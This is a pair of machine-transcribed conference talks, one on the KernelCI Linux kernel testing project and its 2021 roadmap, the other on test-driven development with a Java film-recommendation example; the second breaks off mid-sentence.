main takeaways are that we should be trying to test patches more, or start testing patches with native tests because right now all the tests on connoisseur.org, all the builds even on connoisseur.org are only there because a change was pushed to Git branch. So monitoring a number of Git branches, when there's a neurovision, it gets built and tested. And that works for a lot of things. But we're missing a lot of the early stages when a change or even a patch series is being sent to a mailing list. That's when the first review is being done. And having it tested at that point by connoisseur would add a lot of value. Also it would be easier to report issues because we know the people on the thread would be notified of the results. When by comparison, when you have a regression in mainline during a merge window or on index next, you have a lot of changes being merged all the time in these cases. And so you don't really know which individual change caused the problem. So if there's a regression between yesterday and today, you don't know who to tell that there's a problem. So you can guess based on what tests failed. And you can do bisections to find the actual commit that caused the problem. And that's the ideal case because then you know exactly who to send the reports to. So that happens kind of later, it's like a medium feedback loop. We need a shorter feedback loop for the early stages of development. And then we also need longer running tests for having a long test feedback loop to be able to do things that individuals can do themselves like running really extensive tests that take days on a huge variety of platforms. So these things we can do them for like RC tags or stable releases because they don't get updated that often. And it's really important to know, well, the idea is that these versions should really work as well as possible. So that's why it's important to test as much as possible. And that's after the initial reviews have been done. So I think Sysbot is contributing to that is helping address this part of the problem because fuzzing is a long term, it's long running tests. The results are not really part of the short feedback loop you get with sending patches. But things like that, things will be discovered later. But it's also something we should be improving with native tests like we could be running more LTP or maybe KSELF tests on a huge variety of platforms. That's something to explore. And the third main takeaway from the survey was to improve the web dashboard. Even though a lot of the workflow for kernel development is not around emails, we found that a majority of people also would benefit from a web dashboard that would give them the information that they need. The current dashboard is quite static. And we found that there's many different types of people who need to see the data in many different ways. And without having a flexible way of doing that or more precise idea of what people really want, the kind of the scale at which people want to be able to customize what they see on the dashboard, without having that we can't really have a good dashboard. So what we have now is a minimal version that helps, that works to some extent. But we're collecting user stories to try to understand better what an ideal dashboard would be so that it would really solve people's problems, so it would be a really useful tool. So yeah, we're trying to have this more like data driven based on the feedback from people. So if you send us your feedback, we'll have an idea, we'll work with UX designers to find out the best way to have a tool that works for people and then we'll work on implementing it. And of course, having then feedback, more feedback later, we'll have something to show it would be really helpful as well. So how does it work? How does kernel CI work? And now we've explained all these things, maybe I think it's important for people to have an idea of how it all fits together so that you can then contribute and then take part in it or maybe suggest ways to change it. So like I've explained before, you have native tests. These are orchestrated directly by kernel CI. They are normally running in Lava test labs, but not necessarily, they can also be running in other types of labs. We have a couple of the labs, other types of labs. You can also have tests running in Kubernetes for like static analysis. So all these tests are using the builds produced by kernel CI and the results are being sent to the kernel CI backend and you can see them on the kernel CI front end and on kernel CI.org and emails are being sent with the results for that. Now we also have the KCIDB database which collects results from other CI systems, other complete CI systems that do their own builds, run their own tests on their own platforms. So they work on their own, but they then submit the results they have to KCIDB. So CKI has been doing that since the beginning and we also have Google Sysbot. We also have the native test being added to KCIDB and we have an increasing number of them which I'll come back to that a bit later. So what are the native tests, what's their nature? So first you have the baseline tests which are basically like boot tests, but a bit more. So the boot to login prompt and then the check for kernel errors and they run the boot RR test suite which has a series of checks for each platform to verify that the right drivers are loaded and devices are probed and things like that. Let's run on all the platforms, run on all the kernels, basically all the possibilities for the native tests, all the apps connected to KCI.org, we all normally run baseline on all their machines. Then we have some custom written tests like the sleep test which is basically suspended using RTC wake. I suspect this is similar to what some maintainers would have designed for their own personal work pro or their own local system, local test system. So if that's the case, if you have a test like that that you think would benefit others, you can submit it to kernel CI, we can add it to the native tests and have it run more widely. Then we have more classic test suites, we have v4l2 compliance, that one we've been running for a while now with UVC video for webcams on a variety of platforms and also with a Vivid driver with QMU. We have been running some parts of IGT for the Panfrost 9.1.5 into LGPU drivers and also for some display drivers, DRM, KMIS drivers. We more recently started running LTP tests. As you know, LTP is a very big framework with a lot of tests. We've identified about 35 subsets of LTP that appear to be relevant to kernel CI because they exercise some parts of the kernel and we have like two or three in production now, so the IPC and crypto I believe. Some of them are being worked on, so they're running only on the kernel CI staging instance and they'll be deployed in production when they're working well enough on a number of platforms. We'll keep growing that, keep growing LTP support and hopefully we'll have a good share of these 30 or 40 subsets of LTP by the end of 2021 if we keep at that pace. Similar story for case health tests, although we started about the same time, around the same time, but it's a very different test suite because it comes with a kernel. It's built in a very different way, so we had to fix some issues with how to build it initially. We've done that now to separate the case health test build log from the kernel build log and also now we're starting to look into how to run subsets of case health tests, especially because case health tests are more likely to cause kernels to hang or to crash or to have side effects that would make subsequent tests to fail or not run at all. This is especially true for case health tests more than LTP or other types of user space tests. We're still preparing all these different things to make it more reliable as a test suite to run and build. A lot of work has been done already and we don't yet see the results because we're adding all these different bricks and at some point we'll be able to turn the light on and then we'll have a lot of results coming. It's different in that respect from LTP because LTP, we have some results very early and we keep growing it in a linear way. With case health tests we have this threshold moment at some point where we'll suddenly have a lot of results hopefully. Then there's many more in the pipeline like I've mentioned before, you need a key unit and cyclic test for real time. Basically any test that exercises the kernel is a valid test. Whether the main kernel site team of developers works on enabling it or whether it's a maintainer or whether it's someone else, it's important for us to accept. We make it easy for other people to contribute their tests. In order to scale we need to be able to accept tests from other people as well. One special feature about native tests is that they can be bisected. We can have an automated bisection run for them because kernel CI orchestrates the native test, it does the builds, it runs the test and collects the results. You can then do that again for a different version of the kernel. Just run one test and that's what bisection does. For every kernel CI native test result we're tracking whether the pass or fail. When the test used to pass and one day it starts failing on a branch or with one revision it starts failing, then a regression is recorded in the database. Normally an automated bisection would be started for that regression. We have a range, a good version, a bad version, on a branch. We know the architecture, the compiler, the platform, all these conditions. Basically we can run a bisection for that. Now a few checks to remove false positives, remove duplicates. When all that works then you have a bisection email report sent to the kernel CI results mailing list. That's a result we use to moderate the reports because we still want to avoid having the same results sent multiple times, typically when there's a problem and a fix has been made but it's not merged yet or it's on a branch that hasn't been pulled in Linux Next or for any reason, it can happen that the issue is known to be fixed and still the regression is still present. The 90% of the work is automated and we have this extra manual work at the end to make sure that we don't cause too much noise with email reports. That's something we can work on improving now. We have better support for tests as well. This currently leads to about one bug fixed per week in the kernel. Sometimes the patch would be reverted or dropped or rewritten or fixed will be added. Every bisection will lead to a different story. I've added three recent ones. I've added some links to some mailing discussions for three recent ones just to give you an idea of what that gives us. Now you know a bit better how kernel CI works, what it does, its purpose, how it all fits together, how can you take part in kernel CI? In the same way that Linux kernel is a big open source project, it's following the open source philosophy and it's one repository that can be built in many ways and works for all the people using the kernel. So it works on small devices, big devices. There's one upstream kernel. In the same way we want to have one kernel CI to be able to test that whole kernel. Of course that only works in the same way that open source works. You have many different contributors who care about their own use case and come together for one source project. So for kernel CI the idea is to have all these different ways of running the kernel, being tested in all these different matching ways and have all these tests being pulled together in what we can call open testing philosophies. We don't just use open source but we also pull together the different hardware that's being used for testing the kernel, the different test definitions and regroup the results. And also it has to be driven by the community like for open source design. It's not just the license of the code but it's the whole approach to how the system is designed. So that's why it's important for members of the community to take part in the project to really succeed in the long term. So there's different ways to contribute. You can contribute test results. So if you have as an individual or as an organization, if you have some platforms you want to use to run tests during kernel CI test, you can set up for example a lab and have it connected to kernel CI to run the native tests on it. So that will include things like the baseline tests. You can have IGT run on it, ILTP and KSELF tests and all these native tests. You can have them easily run on your platform if you create a lavalab. If you already have a way to automatically run tests to make tests on some platforms and if it's not lavalab you can also connect it to kernel CI. We have a component like that already. And then if you have a full CI system where you already make your own kernel builds and you run your own tests on your own platforms and everything is integrated and it works on its own, you can submit the results that are produced by your CI system to the KCIDB database. So the KCIDB database is used for common reporting. So the final goal is to have one web dashboard which would be like a superset that we currently have to show the results from the native test but from all the other CI systems that report to the same database as well. And then also send a common email report on the mailing list to have a complete picture of how one kernel revision has been tested, for example. We have a number of contributors, submitters already like CKI and CISPOT like I've explained before. So if your company or if your organization has that, you know, it could be an index distribution, it could be an OEM, it could be anything. Typically we need to be upstream focused but the rules for that are a bit more flexible than for native tests. For native tests we're only monitoring upstream branches like maintenance branches, stable next mainline. For KCIDB you can be verning a distro kernel. So I think like a real downstream branch like from a complete integrated product would be maybe not too useful but it depends. Every test result is useful to some extent because then we can compare things. So if you run a product that's, you know, if it's an Android phone with a 318 kernel, for example, we can compare that with the current 318 version. That's kind of an extreme example. But having extra data from real products can also be useful and it's not something kernel CI native can do. But there is some data, some testing being done to a large extent out there and KCIDB can help convey all that data into one place to have added value. Then you can also contribute to the project more directly to the, so you can submit your own test suite or test plan definition. So if you, like I've explained before, if you're a maintainer and you have your own set of scripts to test your part of the kernel, if you think it's going to be useful for other people you can also submit it and we can add it to the native tests of kernel CI. There's a manual about, a user guide about how to do that now. They can also contribute to the core of kernel CI, so extending the build coverage, that means maybe creating new Docker images with all chains to build for a different type of architecture. It could be all kinds of things like that. Improving the pipeline. So right now we're using Jenkins for the native tests and we want to start using our cloud resources more with Kubernetes. So maybe, well, there's Jenkins X, I suppose that's one thing, but also we're looking into using newer technology like Texton and maybe other types of frameworks to really make the best use of cloud resources. Also just, if you try to set up your own instance of kernel CI, try to use it, you'll be relying on the documentation and if you see any problem in the documentation or any gaps or problems or mistakes or whatever, you can try to help improving it. So for all these things you can get in touch, if you're not sure, you can get in touch, if you have any other, any topic you want to discuss, you can get in touch with us on the main English, kernelCI at groups.io, on ILC, kernelCI on free node. That's also of course possible just to send a ball request on GitHub. Or create some issues, you can also have issues to say, I want a new branch to be monitored, I think like that. So what should we expect in 2021? So the project has a technical steering committee which was defined as part of the Linux Foundation project setup. Now in 2021 we want to have it better defined to actually define roles. So some people would be in charge of the services being run, the cloud elders, some people would need to be in charge of the documentation, of responding to requests on the mailing list. There's a number of things like that that we should identify and document and then we would have points of context for each of these things to be more clear, more transparent about what the project is, how the project actually works from a practical point of view. So we should have all these documented in a public way. It's really like a maturing phase for the project and also that would make it easier for the community to contribute. So it's about empowering the community to know where to start, to be able to add a test or whatever needs to be done to basically keep the project evolving hand in hand with the community. And here I've just listed a few things that we could be doing in 2021. There's an infinite number of things. Some of these things will be done by the current main core kernel CI developers team and some of the things could be done by additional developers, members from the community. And there isn't a clear border between these things. It's more like people frequently contribute. It's like in any project, you have like any open source project, you have the core contributors and people who readily contribute less and people who contribute less occasionally. So all these combined together, basically we have a list of things that would seem the most important ones. But of course, if you have something to contribute because it's important to you, there's no reason why that can't be done. So we've started doing a running K unit with Brendan Higgins from Google and Haydee who is an intern as well. So they did it like 80% of their work, it's not yet in production, that's something we would like to complete. We also want to run more static checks like device to validation. We had Isaias an intern from Microsoft who did again a great share of that work and used to be completed. And running spas or whatever aesthetic analysis can be done on the kernel. We also want to continue working with Pangatronics and other people about having better support for LabGrid to try to make it as easy to use LabGrid as Lava with native kernel CI tests. And the other things I've already talked about in this talk. So we want to gather some user stories for a better web dashboard, redesign a pipeline using cloud infrastructure, improve automated bisection and keep extending what we're already doing with better build and functional test coverage and more maintenance branches for all the native tests and also having more KCI DB contributors. So this is basically all the things that we should be taking care of. And of course, testing patches is also something that's important, but it will mean more changes in the way we work with kernel CI. So that might come a bit later in 2021. Still we know it's an important topic. So thank you for watching. And I think now we can have live Q&A session. So on this slide I've put a few links and pointers to get in touch. So with the main English, get hoping. I'll see. Thank you very much.
KernelCI has now been a Linux Foundation project for just over a year. During that time, it has set the basis needed to fulfil its mission of being the de facto upstream kernel test system. We can now build many more kernels, run many more tests and collate results from many more test labs. We also have a growing team of core contributors, an on-going commitment from our member companies as well as more presence in the kernel community. Together, we are gathering the momentum needed to start a trend. Now we need to make KernelCI a natural part of upstream kernel development and realise its true potential. The Community Survey in June 2020 showed there is great value and interest in having a more test-driven workflow. While this is going to be a long-term goal, we already have a process to let the community shape the KernelCI tools according to their own needs. This talk gives an overview of how it would work, essentially by allowing decisions to be based on feedback from the whole ecosystem (developers, maintainers, OEMs...).
10.5446/52812 (DOI)
Okay, hello. Hello, welcome to this talk to this presentation about TDD. And I hope you will see how there are some benefits around playing and working with TDD. And I will see, we'll try to see something related with the good and bad parts around TDD. So thank you for joining me. And I hope you will like this presentation. So the first thing first, thank you for attending. And thank you for joining. You know, there are different difficult days today. But yeah, I hope you will, all of you will be, let's say, in a safe mode and stay safe. So why this session about as I mentioned, yeah, it's about understanding why it's important to TDD. If we are able to build tests, why not make it know before writing production code? Let's see, we can understand the benefits of building the code by cover by test. It's a doing it before versus doing after. And yeah, basically, so try to let's say, even with this phase, yeah, but do not run away. So please, then and see if it's interesting for all of you. Oh, so yes, a few words about who I am. I am Nacho. I'm from Barcelona. I'm a senior software engineer at Dynatrace. And yeah, I'm a TDD and clean code fan. And yeah, I started to write code a long time ago. And also, if I'm the founder of Barcelona Java user group and the Java and GBBM Barcelona conference, a big conference that we organize every year here in Barcelona, sunny, sunny city. Yes, I was, you know, marathon runner, not too long time ago, but it was, I was. And yeah, you can follow me on Twitter. I tried to tweet about TDD, good patterns, cloud computing and these kind of things, probably something about Kubernetes and these kind of things. And yeah, you can ask me any questions, of course, at just write any particular question I will try to answer if I'm able. I hope so. So yeah, small warning about it. Everything that I will sharing here is about based on my personal experience. So I hope you will understand that probably some options, some ideas are coming from my understanding. And yeah, this is the agenda about the session of today, where it comes from this idea of TDD, the advantages and disadvantages around it. Let's then describe a little bit about the process and rules. Then I will explain a little bit about what I understand about good habits around clean cold and not only about clean cold, but really about the process and the TDD itself. We'll see then an example and then I will try to go and do a small recap. So let's start. Let's go back to the history, you know, where where everything started. So it started from around the 90s, where it came back, let's say, discovered TDD when working with with his first testing framework. And it was when he was working at Chrysler and was writing a book around extreme programming techniques. And basically the idea was to take when when the computers are we're working with input tapes, the idea was to take the input tape, manually type the output tape, and then program until the actual output tape makes the expected output is something really similar to what we are doing right now, right with each unit frameworks. And yes, it's something it's right, wrote and written more than 20 years ago. But still is really interesting to have a look and to understand all the extreme programming techniques that Ken Beck was discovering, he's in his book. So yeah, for a moment, just imagine that in a particular way, you can find the text defects earlier, where you are running, let's say, or designing your test, instead of waiting until the code production is the code is in production, or you write something and then you have to later on demonstrate that it's working fine. And imagine at the same time, you can easily detect some regression errors, and you can follow also a really important point is that imagine that you can actually use a simple process always and you try always to do the similar small steps where you can actually, those steps can help you know to detect that there is something wrong in the middle or in this small step that you did before. So in this way, the steps that you are going to do is going to be, let's say simple for you and easier to detect any particular mistake. And then your software is going to be, let's say easier to add at long term, your software is going to be easier to refactor because of this safety net that you have, because you have a lot of tests, or you have at least some tests. So yes, this, this continue imagine in this world, right, where your software gives you an idea of how a consumer, let's say somebody else is going to consume or use your API or your, your, your software, your building, and also your tests are like live in documentation, right? So it's likely that your, your software that you're going to develop at the same time is going to be having less bugs. And this is something that is demonstrated. There are a few references that include here are some extracts and clonkujas and some studies that they have been done in teams that are being used in TDD and it's demonstrated that development cost is going to be lower because you're going to have less bugs and it means you're going to be less problems and then your server is going to be cheaper to maintain. So imagine in that, yes, so yeah, I'm not lying to you. So it's not like I'm selling this idea of TDD is going to solve all your problems. No, that's not true. But at least it's going to solve some of them, right? And yes, it has some disadvantages. I don't want to, I don't want to lie on this, but it's, yeah, there are some problems that is not so easy. So there are things that are complicated. It's not so easy to start with. I have to say, because nobody tells you this is the, this is the best way of starting. So there are not many good places to start. And majority of people, let's say, are not using it daily. And therefore you cannot say go with your colleagues and say, how are you, how are you doing TDD? Oh, no, no, practice TDD. And this is a complicated way. If somebody is not doing it, then how are we going to learn with your colleagues? And also has a high learning curve. It's not really that something you're going to start and read a document or do document with two pages and then that's it. No, so it depends exactly on the complexity of your code and how your abilities as an engineer and understanding the basic concepts and then promote it and make it work, let's say, in your day to day. And also it can be a large investment. So it makes that you're going to invest time and effort in doing these kind of things in your company or in your team. And therefore it's not something that everybody can do it because we have times where we have to deliver things and it's not always able to do these kind of things at the same time or because you know you have compromises with your customers. So yeah, it's not, it's really easy. It's really easy to understand that applying TDD is always difficult. And also it makes that from time to time you can forget the rules. It's really easy to forget about implementing it or using it because your team is not encouraging you to do it, right? And also for many people it's giving you resistance. It's provokes resistance in terms of I don't want to use it because it's a bit difficult for me or because I don't understand it or because I don't like it. And also it can be corrupted in terms of how to leverage the level of coverage to your code coverage, right? And it is not about this. TDD is about another thing, right? And at the end it's extremely difficult to master it because there are not, let's say, single truth about this. There are a lot of practices and mechanisms to apply it and how to do it is not really, really easy. So I would say that talking about how it is, well, you learn probably to write code, no? Long time ago, like, yes, like you did probably riding a bicycle. So for me it's like, you know, understanding that you have to, you know, learning to ride a bicycle, but let's say a different bike, no? And also when you are older. So that's going to be a bit more difficult, right? That's more for us, how we understand, to understand and learn about TDD. It's going to be, yeah, it's something that's going to make you think about, oh, it's not what I thought or what I learned time ago, but it's not going to be so easy, right? But yeah, the things that, you know, everybody knows that the things that are really cool are because they are not happening in the comfort zone. So that's why TDD is about you. I think the magic happens out of your comfort zone. So we are not going for trying to use TDD. Probably it's because of this. So yeah, let's continue with the process and rules to understand how the process is and how it works. So the process is just these three steps. It's not that difficult, but it makes difficult to make it daily. So the point number one is to just write the test and see how it fails, right? It's important to mention that it's important that the code has to fail because if not, makes no sense, right? To write that test. And it's important to specify, basically, in that test, what we want to code, right? Because it's kind of idea of this is the expectation that we want to achieve. Okay, we want to test that and when this test is green, then it makes, we solve that problem. That's the first step, no? Write the test and see how it fails. And the second one is just code that the test is failing and just make the minimal test that is going to make that test pass. So it's make it from red to green. Nothing that, nothing that that is basically just write enough code to satisfy the, say, the dependency or the behavior that we want to make. This basically make it work. Okay. And the last step is the step number three is basically see how on the picture that we have right now, they say after this test that is green, just see how we can improve the code and without changing this behavior. No, it's basically the refactor step. And it's like seeing how we can clean the code and the test, of course, to remove, I don't know, duplication, make it better and make it more understandable for the next, let's say, for our next maintenance. That's it. So that's the overall process. There are some rules that Robert Martin described time ago. I will try to explain in a different way with summarized. Basically, the rules is you are, yes, you are not allowed to write production code until you have a test that is failing. So it's basically, okay, we have to focus first on the, on the test. And basically demonstrate that this test is passing. So basically, you cannot write directly production code that is not, let's say, pushed by a test. That's more or less the idea. And yes, we are not allowed to write anything like anything more than a unit test sufficient to fail. So we basically start to write in this and then basically maintain it. So basically, test has to be, you know, very consistent and be maintained also. And yes, it's similar to the first, the first rule. So we are not allowed, let's say, to write more production code than the sufficient to pass. It's like writing the minimal, the minimum amount of code that is help, is helping us to make the test from red to green. So basically, don't do any of our engineering solution, do simple code and do not, do not, you know, think on the, if somebody tried to use this or if I tried this, so don't know when you just try to make the simple code as you can, and the simple solution and make the test passes. So that's more or less the three, the three ideas that you have to take into account when, when applying TDD, right? Related with that, let's move to the next topic that is explaining some good habits that I found, right? Because all of these things probably many of you know, but as, as, as we already know, there are some habits that we have now that are a little different from, from a year ago, no? So even now we are washing your hands no more frequently. So we have to try to understand that there are some habits that I saw that are really good for applying TDD. And then the first thing is just try to, instead of writing the production code, just see that the test is failing. It's something that is, is, is stupid, but there are times that where you are building something, you are, you're always thinking, oh, probably when we have this solution or this problem, probably I can put this condition there. And then the test that you, the next step that you're going to write, the next test you're going to write is going to be solved. So don't, you know, over engineer that at that point and don't think about if that is going to happen. No, don't just focus first on writing a test and see that this is failing because then it's going to be helping you to write the minimum of code in production, nothing more than that, right? And yes, one of the good habits that I recommend is to, you know, to not put many reasons on the, many assertions, let's say on the test side and see how if a test is failing, that there's only one reason to understand why it's failing because then you will see, if in case it's something is failing, you will see only one reason, oh, the problem is here and it's not difficult to find how to, how to solve it. And yes, another, another, another good recommendation that I have is just write assertion first when you're writing the test, just go and write the assertion first. I will, I will show you how to do it on the demonstrated part, but just remember that. And there are some recommendations that I normally use when writing a unit test, this is for Java code, yes, but I think you can apply where your language is, when your language accepts this, this description. So the first thing is to end kind of a, a nemotec, is it can end as a suffix, right? Of course, you have to think if it's possible because you probably need to change your CI or CD system, but if you can try to change your classes with shoot ending with shoot. At this point, basically you will see, oh, there's no, there's no change. Well, there's a small change that basically will help you to understand that the next method should describe something. So basically you're doing something on that class, particular shoot, and then you can basically start with verbs, but basically will describe you the behavior. So let's say in this case is shoot fail because any reason, so should accept whatever. So that's the point about this shoot, let's say, suffix that will help you to explain the behavior that could be the different cases or corner cases that you want to describe in your test. And basically if you understand like this and you describe in plain English, it's going to be more easy to understand. So if you run then the test, you will see that basically the focus that you've been describing as a test is going to be more easy to understand. So in this case, for example, we have four tests that have been running and they are really clear about what they behave. The scenario that we are testing. And basically that's the overall point. So our test will describe only behavior and our test will be more clear, are more understandable in terms of business, in terms of more high level than the lower level. And some tests fail, of course, we can have a look and easily, but probably understanding as a pure English is more easy to understand if someone else come and join the team without knowing anything around the business. And we don't know to get into details, right, if we don't need it. So basically the idea of this description in a pure, let's say English, where everybody can understand is more clear no matter how you describe your implementation or do your implementation more or less. So yeah, another good recommendation about the test and how to make it happen, let's say, is the order, how we can process and continue with the description of the, how we implement, let's say, an applied TV. So in this case, as you mentioned, probably I mentioned before, I would recommend to name the class properly. And the second thing is, of course, just create a test with the correct order specification that we expect, in this case, return something when whatever situation happened. So the next step is define what you want to check. At this point, yes, I'm sure everybody will say why you are doing that, because basically what I want is to describe particularly the conclusion of this test, how we are going to see that this is working. Okay, at this point, yes, the compiler will say in that case, everything is red, so everything is not fine, because I don't have the previous lines, right? But at this point, we are sure, focus on what we want, which is the conclusion, okay? That's more or less the idea. And then you go up. So basically, then I have to trigger the code to see how this behavior I can throw it, let's say, or run it, and then fulfill the test with the rest of the setup. So let's say, I have to do something else, I can do it that way, et cetera, et cetera. Okay, so that's more or less how to do it. So make it from, let's say, from the bottom line, going up more or less. That's my idea. Yes, but how to start it, right? In terms of how a team can start doing that thing, so how a person can do these kind of things or practices, I would say that you can start, let's say, by little, no? In your caters that you can do with your colleagues or with the proofs of context or personal projects, it's the best way to understand how to apply small things, and in particular, start really, really small. And you can also try to keep practicing with the communities or with your colleagues, try to make it happen, and internalize it to make it, let's say, something really familiar with you. And of course, you have some content online where you can check it. And my final recommendation is to, one of the best ways I think is just practice with somebody else. It's basically practicing and do peer programming with colleagues. That's one of the practices that probably many of you will understand that is helping in many directions in many areas. But for the ones that are not familiar, basically, the activity that two people are at least working in the same problems, like this image that appears here, when you have a driver and a navigator. One is focused only on writing code. The driver is writing code. And the navigator, let's say, is reviewing what is happening and looking forward where we are going to be on the next step. Let's say, and consider more like a vision, more strategic, but this idea of what we are doing. And these roles are going to be switching. So basically, the idea is that when the driver ends because he wants to switch, or because the pair was convinced to do it in a particular way, I don't know, every 10 minutes or 50 minutes, don't care. And the idea is that this swap will help people to be more focused on this problem and switch also the minds for understanding that how we want to try to understand it. Now I'm driving it. It's going to be a bit more fresh in this way. And also this back and forth between working as an observer and as a driver, it's going to help to get more feedback when building the system. So at the same time, you're doing the review of the code. So that's why doing this way, one way or another will help on the overall picture of the solution of your project. So now let's see if I can show you an example based on actual code and that I did basically in a small example. So I will show you my slides. Yeah, basically was trying to make a live coding, but normally I try to do this in live coding. I don't have time to do it and show it to you in this session. So in any case, I will try to explain you. So the idea of this example is to, let's say, build a service that can recommend you. So let's say we have been working as a startup that is basically trying to rent films over the internet. And our managers say, okay, we want to build something that could recommend films to the user. So basically it's kind of a recommendation system where you can introduce a particular genre and the system will give you back a list of films that are ordered, let's say, according by average rate. So if the users, let's say, say I put a nine or a 10, the results of the system will give you more films that are more rated than the lower one. So here you can see an example that the system services could look like this. So I will build a system like this that basically accepts a parameter that could be the genre that we are going to ask for. And then the system will give us back the list of films, more or less. And I feel that we'll contain kind of a title year and when it was published, the tax and also a genre. Okay, so let's start with the first idea that I mentioned. So the TDD process is really no simple as I mentioned, let's write first the test and I was mentioning before, let's start first with the assertion, with the things that we want to focus. At this point, as you can see, I was writing the assertion and the assertion says, oh, I don't understand anything about this recommendation service because on the code, I don't have anything. And that's true, this service was not already in the code. That's why in the next step, it was exactly this. So I created the service, nothing really fancy, I created a new class. And then at the next point, basically, it's to instantiate is the line 11, as you can see on the left hand side. And the next step, of course, is that now I understand the compiler saying, okay, now understand what this service is, how we can continue because I don't understand anything about this field and these parameters that you're introducing. Okay, so let's continue this approach and build that method to see what we want to achieve because basically, we are still on the first step, which is defining the assertion, see how we can define this test. Still, the test is not able to make it a threat step. So continue with it, we define the method on the right hand side, and you will see that there is a particular implementation that we want. Basically, we can return a list of films where the method is filmed by Genra, is getting, well, we get by parameter the Genra that we are going to get, and then we are going to return at some point a list of films. That's more or less where we are. Okay, so we will continue defining this because we want to achieve something, but it's basically one that the method is, let's say compile and it's, let's say, at least on the right hand side of production code is compile, we have also to include the film class that is on the right hand, as you can see, basically, an empty class that doesn't have any particular thing right now. But on the left hand side on the test, what we want to achieve is to have a look on the expected things, right? What we want to achieve is to, when we call that method with a particular Genra, we want to verify with the expected films. And these are the things that we want to continue describing, which is, okay, let's imagine that we want to verify that the test we are building, running this service with a particular scenario, which is science fiction, is going to return to us some data, okay? So in this case, I'm building a matrix, this is a good movie, by the way, and I like it very much, to be honest. But in this way, what we want to achieve is to describe this particular test, this film is one of the ones that we want to return. But at the same time, probably what we have to do is to change or define on the film, right? Because we don't have that film, as you can see on the previous slides, we cannot see, right? The compiler was saying, okay, I don't understand on the left hand side that the film has anything related with these parameters. And that's why we try to solve it, creating this constructor, right, on the film plus. This is exactly what we're doing on the right hand side. But then what we want to achieve is not only to returning one. And so it's going to be great to demonstrate, right, for the testing purposes, is to get more than one result, right, on the service side, to see that there are order, you know, one of the requirements was that we have to retrieve the films, but ordered by the score. So basically, at least we might need, you know, at least two films. That's why on the next step probably is to also fill, of course, the constructor of this class with all the values that we receive, right? And the next step is to create another film, right? Because basically what we want to achieve, as I mentioned, is to try to verify that those, at least two films, sorry, are getting and getting in the order that we expect. So in this case, for example, I introduce another film, it could be Star Wars, I don't know, probably another, many of you already saw that movie, another great movie. And basically, I tried to build it like this. So now the test is clear. So when I run this test, I expect that those films are already in that way, right? And they have to have those values, right? So more or less, it's not really fancy, but at this point, I can run the test because now it's already compiling. And now, of course, the method is telling me, oh, this is not working, right? But at least we have this first step of the TDD, which is build the test and put it red. So okay, that we are on the first step. And yes, the test is red, because basically on the right hand side, you can see the implementation, the implementation is not doing more than throwing an exception. Okay, nothing really fancy, but interesting in terms of putting the test in red. And the next step could be probably just do something, no, to trigger that code and go to somebody, to somewhere, sorry, to get information, right, to this query, those films. So basically, we need the repository. This is something that we introduced here as a dependency to the service, we introduced a film repository to get this data back, right? Imagine a database, for example. In this case, of course, as you can see the compiler was saying at this point, okay, I don't have this repository, how I can do with this, okay? The next step probably is to create this repository, create another service, another class, in this case, a repository, that's not doing anything from now, but at least be injected on the service to be able to use it, right, from this perspective. If we try to run, of course, we are getting the same results, because we haven't changed anything and the test will not be green, but at the same time, let's double check that in terms of, okay, the test is not affected, let's say the result by this introduction, this dependency. So let's continue with the next step that will be this trigger something on the repository to find something, because otherwise, change the test will not pass through. As you can see, we are still on the red, right, and we are going to try to put it to green. Probably the most simple thing will be return a list that it will be exactly the same for the metric and episode four, but this is not going to help us to drive the solution towards the solution that we expect, that is basically use something else that is helping us to retrieve information. That's why in this point, we introduce this film repository and we are going to create a new method that is exactly what we are doing here. So as you can see, film repository was called by a particular method, let's say, in a particular order, that is the fault order that we expect. As you can see, the compiler was saying, okay, I understand what is film repository, but I don't know anything about the sort order, either defined by genre method. And that's why the next step we are going to do is basically create this sort order that is a particular n that we use on the right-hand side. And below, you can see the method already, the fault method, let's say, implemented by the film repository, which is completely empty. So if you continue, the result is exactly the same, because right now we are implementing anything on the repository side. So at this point, what we expect is run the test, but we have not done, sorry, it's not true. Right now we have a null pointer exception, as you can see on the result of the test, that is basically because the film repository that is used on the line 40, so let's say here on the production code is null. Why is null? Because we haven't instantiated on the test side, right? On the left-hand side, you can see on the line 20, film repository is not instantiated, right? But we don't want exactly, we don't want exactly to go to the database, right, in a unit test. Or at least we don't want to do it because of these importance of using an integration test. Those are the tests that are really defining for that purpose. And that's why we expect that unit tests should not access database and remove all the dependencies while integration tests can connect to the database or connect the third-party system, use an API for a third-party system, etc. or work with files, just to not, let's say, use dependencies that could affect the result of the importance of the impact, sorry, of the unit test. That's why at this point we should think about what we have to do to solve that issue, because now if we implement, let's say, a repository that accessed the database, we are going to access externally. A database is going to be an impact in terms of performance and also we are coupling, you know, the results of this service, no matter the implementation of the repository. And probably for the service, it doesn't make sense or doesn't care about which kind of repository you want to use, right? If it's Postgres, if it's MySQL, is there any other kind of database, is it not important for the service? But that's at the point that at this point, probably we have to think about another solution for the film repository, right? And at this point, the best idea we can do is to implement, let's say, instead of using a real implementation, okay, is going through using a mock, right? That's why we introduce at this point the idea of a dependency where we can basically replace a repository that could be a real repository in production code with a mock repository that basically will get the information that we expect. So now here in the life, 24 on the left-hand side, you can see that the film repository was defined as a mock and now it's going to be triggered, but it's not going to return anything. So we introduce that dependency and we run the test. We will see that there is nothing, so the result is basically empty, because we cannot see anything. The mock is not doing anything, it's basically being called by this method, but this is not defined. So the result is not, the expectation is clear. We want to expect two elements, that this test has to be equal to, this right has two elements, these two films, but the one that we are getting back from the mock is calling this fine by method is empty. So basically we don't have anything. What we have to do probably is to define the condition, right? So we have to trigger the code, the code is triggered, but we want to define the condition for the repository. So what we want to return from the perspective when this method is called, that's exactly what we want to do in the next step. It's basically on the line 33 on the method, on the test method, on the left-hand side, you can see how we are describing the scenario for the film repository, which is basically, look, when this service, sorry, this repository with this method is used by this particular code, by this method, by this parameter, and this sort order and value, you're going to return these expected films, which is basically the list of films that we created before. What we want to do is that the repository can return the list of films. And these list of films is going to be the one that the service is going to be regaining back, right? So what we want to, let's say, do is demonstrate that the result is going to be pushed for the repository, and depending on the implementation, the repository will get back to us the result that we expect. So at this point, the test passes, right? And passes because, as I mentioned, the mock is describing the solution that we expect, right? But it's not really helping us. Based from this, we get from the other system, and we go a bit into, and now we have two elements, the service and the repository, but the repository is not really implemented because we mocked its implementation. So now it's time to create the test for the repository. And which kind of test we have to create for the repository? So probably we have to create the iteration one, because what we want is to demonstrate that the repository is working fine with a particular implementation. And then here, we can create, this is the one that we did, create a repository test, but this is an iteration test that's going to use a real database connected to a real database, explaining how we can, let's say, return the list of fields that we want, returning filtered by gender, and also 